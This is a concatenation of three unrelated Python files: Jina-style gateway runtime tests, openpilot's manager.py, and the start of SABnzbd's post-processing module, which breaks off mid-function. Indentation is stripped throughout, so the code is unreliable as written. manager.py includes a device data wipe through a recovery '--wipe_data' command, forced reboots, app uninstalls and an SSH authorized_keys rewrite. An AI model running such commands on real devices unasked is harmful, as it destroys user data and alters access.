assert doc_texts.count('pod0/uses_after') == 1
for i in range(10):
assert doc_texts.count(f'pod0/shards/{i}') == 1
@pytest.mark.asyncio
async def test_runtimes_gateway_worker_direct_connection(port_generator):
worker_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'
# create the shards
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port, f'pod0')
)
worker_process.start()
await asyncio.sleep(0.1)
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
worker_process.terminate()
gateway_process.join()
worker_process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1
assert gateway_process.exitcode == 0
assert worker_process.exitcode == 0
@pytest.mark.asyncio
async def test_runtimes_with_replicas_advance_faster(port_generator):
head_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
# create the shards
replica_processes = []
worker_ports = []
connection_list_dict = defaultdict(list)
for i in range(10):
# create worker
worker_port = port_generator()
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime,
args=(worker_port, f'pod0/{i}', 'FastSlowExecutor'),
)
replica_processes.append(worker_process)
worker_process.start()
await asyncio.sleep(0.1)
worker_ports.append(worker_port)
connection_list_dict[i].append(f'127.0.0.1:{worker_port}')
# create a single head runtime
head_process = multiprocessing.Process(
target=_create_head_runtime, args=(head_port, connection_list_dict, 'head')
)
head_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
c = Client(host='localhost', port=port, asyncio=True)
input_docs = [Document(text='slow'), Document(text='fast')]
responses = c.post('/', inputs=input_docs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
head_process.terminate()
for replica_process in replica_processes:
replica_process.terminate()
gateway_process.join()
head_process.join()
for replica_process in replica_processes:
replica_process.join()
assert len(response_list) == 2
for response in response_list:
assert len(response.docs) == 1
assert response_list[0].docs[0].text == 'fast'
assert response_list[1].docs[0].text == 'slow'
assert gateway_process.exitcode == 0
assert head_process.exitcode == 0
for replica_process in replica_processes:
assert replica_process.exitcode == 0
@pytest.mark.asyncio
# test gateway to gateway communication
# this mimics using an external executor, fronted by a gateway
async def test_runtimes_gateway_to_gateway(port_generator):
worker_port = port_generator()
external_gateway_port = port_generator()
port = port_generator()
graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
pod_addresses = f'{{"pod0": ["0.0.0.0:{external_gateway_port}"]}}'
worker_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'
# create a single worker runtime
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port,)
)
worker_process.start()
# create the "external" gateway runtime
external_gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, worker_addresses, external_gateway_port),
)
external_gateway_process.start()
# create a single gateway runtime
gateway_process = multiprocessing.Process(
target=_create_gateway_runtime,
args=(graph_description, pod_addresses, port),
)
gateway_process.start()
await asyncio.sleep(1.0)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{external_gateway_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{worker_port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
timeout=5.0,
ctrl_address=f'0.0.0.0:{port}',
ready_or_shutdown_event=multiprocessing.Event(),
)
# send requests to the gateway
c = Client(host='localhost', port=port, asyncio=True)
responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
response_list = []
async for response in responses:
response_list.append(response)
# clean up runtimes
gateway_process.terminate()
external_gateway_process.terminate()
worker_process.terminate()
gateway_process.join()
external_gateway_process.join()
worker_process.join()
assert len(response_list) == 20
assert len(response_list[0].docs) == 1
assert gateway_process.exitcode == 0
assert external_gateway_process.exitcode == 0
assert worker_process.exitcode == 0
class NameChangeExecutor(Executor):
def __init__(self, runtime_args, *args, **kwargs):
super().__init__(*args, **kwargs)
self.name = runtime_args['name']
@requests
def foo(self, docs, **kwargs):
docs.append(Document(text=self.name))
return docs
class FastSlowExecutor(Executor):
@requests
def foo(self, docs, **kwargs):
for doc in docs:
if doc.text == 'slow':
time.sleep(1.0)
async def _create_worker(pod, port_generator, type='worker', executor=None):
worker_port = port_generator()
worker_process = multiprocessing.Process(
target=_create_worker_runtime, args=(worker_port, f'{pod}/{type}', executor)
)
worker_process.start()
return worker_port, worker_process
def _create_worker_runtime(port, name='', executor=None):
args = set_pod_parser().parse_args([])
args.port = port
args.name = name
if executor:
args.uses = executor
with WorkerRuntime(args) as runtime:
runtime.run_forever()
def _create_head_runtime(
port,
connection_list_dict,
name='',
polling='ANY',
uses_before=None,
uses_after=None,
retries=-1,
):
args = set_pod_parser().parse_args([])
args.port = port
args.name = name
args.retries = retries
args.polling = PollingType.ANY if polling == 'ANY' else PollingType.ALL
if uses_before:
args.uses_before_address = uses_before
if uses_after:
args.uses_after_address = uses_after
args.connection_list = json.dumps(connection_list_dict)
with HeadRuntime(args) as runtime:
runtime.run_forever()
def _create_gateway_runtime(
graph_description, pod_addresses, port, protocol='grpc', retries=-1
):
if protocol == 'http':
gateway_runtime = HTTPGatewayRuntime
elif protocol == 'websocket':
gateway_runtime = WebSocketGatewayRuntime
else:
gateway_runtime = GRPCGatewayRuntime
with gateway_runtime(
set_gateway_parser().parse_args(
[
'--graph-description',
graph_description,
'--deployments-addresses',
pod_addresses,
'--port',
str(port),
'--retries',
str(retries),
]
)
) as runtime:
runtime.run_forever()
async def async_inputs():
for _ in range(20):
yield Document(text='client0-Request')
|
manager.py | #!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
is_neos = os.path.isfile("/init.qcom.rc")
neos_update_required = False
if is_neos:
version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
revision = int(open("/REVISION").read()) if version >= 10 else 0 # Revision only present in NEOS 10 and up
neos_update_required = version < 10 or (version == 10 and revision < 4)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
updater_dir = os.path.join(BASEDIR, "installer", "updater")
manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import re
import stat
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.file_helpers import atomic_write_in_dir_neos
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
# "uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.py"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
"gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
# "updated": "selfdrive.updated",
}
daemon_processes = {
"athenad": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'paramsd',
'visiond',
'proclogd',
'ubloxd',
'gpsd',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# terminate the zmq context since we forked
import zmq
zmq.Context.instance().term()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name, params):
proc = daemon_processes[name]
pid_param = name.capitalize() + 'Pid'
pid = params.get(pid_param)
if pid is not None:
try:
os.kill(int(pid), 0)
# process is running (kill is a poorly-named system call)
return
except OSError:
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
cwd='/',
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock(service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p, params)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("LD_LIBRARY_PATH= appops set ai.comma.plus.offroad SU allow")
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = [" running %s %s" % (p, running[p]) for p in running]
cloudlog.debug('\n'.join(running_list))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def update_ssh():
ssh_home_dirpath = "/system/comma/home/.ssh/"
auth_keys_path = os.path.join(ssh_home_dirpath, "authorized_keys")
auth_keys_persist_path = os.path.join(ssh_home_dirpath, "authorized_keys.persist")
auth_keys_mode = stat.S_IREAD | stat.S_IWRITE
params = Params()
github_keys = params.get("GithubSshKeys") or ''
old_keys = open(auth_keys_path).read()
has_persisted_keys = os.path.exists(auth_keys_persist_path)
if has_persisted_keys:
persisted_keys = open(auth_keys_persist_path).read()
else:
# add host filter
persisted_keys = re.sub(r'^(?!.+?from.+? )(ssh|ecdsa)', 'from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" \\1', old_keys, flags=re.MULTILINE)
new_keys = persisted_keys + '\n' + github_keys
if has_persisted_keys and new_keys == old_keys and os.stat(auth_keys_path)[stat.ST_MODE] == auth_keys_mode:
# nothing to do - let's avoid remount
return
try:
subprocess.check_call(["mount", "-o", "rw,remount", "/system"])
if not has_persisted_keys:
atomic_write_in_dir_neos(auth_keys_persist_path, persisted_keys, mode=auth_keys_mode)
atomic_write_in_dir_neos(auth_keys_path, new_keys, mode=auth_keys_mode)
finally:
try:
subprocess.check_call(["mount", "-o", "ro,remount", "/system"])
except:
cloudlog.exception("Failed to remount as read-only")
# this can fail due to "Device busy" - reboot if so
os.system("reboot")
raise RuntimeError
def manager_update():
update_ssh()
update_apks()
uninstall = [app for app in get_installed_apks().keys() if app in ("com.spotify.music", "com.waze")]
for app in uninstall:
cloudlog.info("uninstalling %s" % app)
os.system("pm uninstall % s" % app)
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
#if params.get("Passive") is None:
# raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
postproc.py | #!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.postproc - threaded post-processing of jobs
"""
import os
import logging
import sabnzbd
import functools
import time
import re
import queue
from sabnzbd.newsunpack import (
unpack_magic,
par2_repair,
external_processing,
sfv_check,
build_filelists,
rar_sort,
is_sfv_file,
)
from threading import Thread
from sabnzbd.misc import on_cleanup_list
from sabnzbd.filesystem import (
real_path,
get_unique_path,
move_to_path,
make_script_path,
long_path,
clip_path,
renamer,
remove_dir,
globber,
globber_full,
set_permissions,
cleanup_empty_directories,
fix_unix_encoding,
sanitize_and_trim_path,
sanitize_files_in_folder,
remove_file,
recursive_listdir,
setname_from_path,
create_all_dirs,
get_unique_filename,
)
from sabnzbd.sorting import Sorter
from sabnzbd.constants import (
REPAIR_PRIORITY,
TOP_PRIORITY,
POSTPROC_QUEUE_FILE_NAME,
POSTPROC_QUEUE_VERSION,
sample_match,
JOB_ADMIN,
Status,
VERIFIED_FILE,
)
from sabnzbd.rating import Rating
import sabnzbd.emailer as emailer
import sabnzbd.dirscanner as dirscanner
import sabnzbd.downloader
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.encoding as encoding
import sabnzbd.nzbqueue
import sabnzbd.database as database
import sabnzbd.notifier as notifier
import sabnzbd.utils.rarfile as rarfile
import sabnzbd.utils.rarvolinfo as rarvolinfo
import sabnzbd.utils.checkdir
MAX_FAST_JOB_COUNT = 3
# Match samples
RE_SAMPLE = re.compile(sample_match, re.I)
class PostProcessor(Thread):
""" PostProcessor thread, designed as Singleton """
do = None # Link to instance of the thread
def __init__(self):
""" Initialize PostProcessor thread """
Thread.__init__(self)
# This history queue is simply used to log what active items to display in the web_ui
self.load()
if self.history_queue is None:
self.history_queue = []
# Fast-queue for jobs already finished by DirectUnpack
self.fast_queue = queue.Queue()
# Regular queue for jobs that might need more attention
self.slow_queue = queue.Queue()
# Load all old jobs
for nzo in self.history_queue:
self.process(nzo)
# Counter to not only process fast-jobs
self.__fast_job_count = 0
# State variables
self.__stop = False
self.__busy = False
self.paused = False
PostProcessor.do = self
def save(self):
""" Save postproc queue """
logging.info("Saving postproc queue")
sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME)
def load(self):
""" Save postproc queue """
self.history_queue = []
logging.info("Loading postproc queue")
data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME)
if data is None:
return
try:
version, history_queue = data
if POSTPROC_QUEUE_VERSION != version:
logging.warning(T("Old queue detected, use Status->Repair to convert the queue"))
elif isinstance(history_queue, list):
self.history_queue = [nzo for nzo in history_queue if os.path.exists(nzo.downpath)]
except:
logging.info("Corrupt %s file, discarding", POSTPROC_QUEUE_FILE_NAME)
logging.info("Traceback: ", exc_info=True)
def delete(self, nzo_id, del_files=False):
""" Remove a job from the post processor queue """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
if nzo.status in (Status.FAILED, Status.COMPLETED):
nzo.to_be_removed = True
elif nzo.status in (Status.DOWNLOADING, Status.QUEUED):
self.remove(nzo)
nzo.purge_data(delete_all_data=del_files)
logging.info("Removed job %s from postproc queue", nzo.final_name)
nzo.work_name = "" # Mark as deleted job
break
def process(self, nzo):
""" Push on finished job in the queue """
if nzo not in self.history_queue:
self.history_queue.append(nzo)
# Fast-track if it has DirectUnpacked jobs or if it's still going
if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed):
self.fast_queue.put(nzo)
else:
self.slow_queue.put(nzo)
self.save()
sabnzbd.history_updated()
def remove(self, nzo):
""" Remove given nzo from the queue """
try:
self.history_queue.remove(nzo)
except:
pass
self.save()
sabnzbd.history_updated()
def stop(self):
""" Stop thread after finishing running job """
self.__stop = True
self.slow_queue.put(None)
self.fast_queue.put(None)
def cancel_pp(self, nzo_id):
""" Change the status, so that the PP is canceled """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
nzo.abort_direct_unpacker()
if nzo.pp_active:
nzo.pp_active = False
return True
return None
def empty(self):
""" Return True if pp queue is empty """
return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy
def get_queue(self):
""" Return list of NZOs that still need to be processed """
return [nzo for nzo in self.history_queue if nzo.work_name]
def get_path(self, nzo_id):
""" Return download path for given nzo_id or None when not found """
for nzo in self.history_queue:
if nzo.nzo_id == nzo_id:
return nzo.downpath
return None
def run(self):
""" Postprocessor loop """
# First we do a dircheck
complete_dir = sabnzbd.cfg.complete_dir.get_path()
if sabnzbd.utils.checkdir.isFAT(complete_dir):
logging.warning(
T("Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB")
% complete_dir
)
else:
logging.info("Completed Download Folder %s is not on FAT", complete_dir)
# Start looping
check_eoq = False
while not self.__stop:
self.__busy = False
if self.paused:
time.sleep(5)
continue
# Something in the fast queue?
try:
# Every few fast-jobs we should check allow a
# slow job so that they don't wait forever
if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize():
raise queue.Empty
nzo = self.fast_queue.get(timeout=2)
self.__fast_job_count += 1
except queue.Empty:
# Try the slow queue
try:
nzo = self.slow_queue.get(timeout=2)
# Reset fast-counter
self.__fast_job_count = 0
except queue.Empty:
# Check for empty queue
if check_eoq:
check_eoq = False
handle_empty_queue()
# No fast or slow jobs, better luck next loop!
continue
# Stop job
if not nzo:
continue
# Job was already deleted.
if not nzo.work_name:
check_eoq = True
continue
# Flag NZO as being processed
nzo.pp_active = True
# Pause downloader, if users wants that
if cfg.pause_on_post_processing():
sabnzbd.downloader.Downloader.do.wait_for_postproc()
self.__busy = True
process_job(nzo)
if nzo.to_be_removed:
history_db = database.HistoryDB()
history_db.remove_history(nzo.nzo_id)
history_db.close()
nzo.purge_data()
# Processing done
nzo.pp_active = False
self.remove(nzo)
check_eoq = True
# Allow download to proceed
sabnzbd.downloader.Downloader.do.resume_from_postproc()
def process_job(nzo):
""" Process one job """
start = time.time()
# keep track of whether we can continue
all_ok = True
# keep track of par problems
par_error = False
# keep track of any unpacking errors
unpack_error = False
# Signal empty download, for when 'empty_postproc' is enabled
empty = False
nzb_list = []
# These need to be initialized in case of a crash
workdir_complete = ""
script_log = ""
script_line = ""
# Get the job flags
nzo.save_attribs()
flag_repair, flag_unpack, flag_delete = nzo.repair_opts
# Normalize PP
if flag_delete:
flag_unpack = True
if flag_unpack:
flag_repair = True
# Get the NZB name
filename = nzo.final_name
if nzo.fail_msg: # Special case: aborted due to too many missing data
nzo.status = Status.FAILED
nzo.save_attribs()
all_ok = False
par_error = True
unpack_error = 1
try:
# Get the folder containing the download result
workdir = nzo.downpath
tmp_workdir_complete = None
# if no files are present (except __admin__), fail the job
if all_ok and len(globber(workdir)) < 2:
if nzo.precheck:
_enough, ratio = nzo.check_availability_ratio()
req_ratio = float(cfg.req_completion_rate()) / 100.0
# Make sure that rounded ratio doesn't equal required ratio
# when it is actually below required
if (ratio < req_ratio) and (req_ratio - ratio) < 0.001:
ratio = req_ratio - 0.001
emsg = "%.1f%%" % (ratio * 100.0)
emsg2 = "%.1f%%" % float(cfg.req_completion_rate())
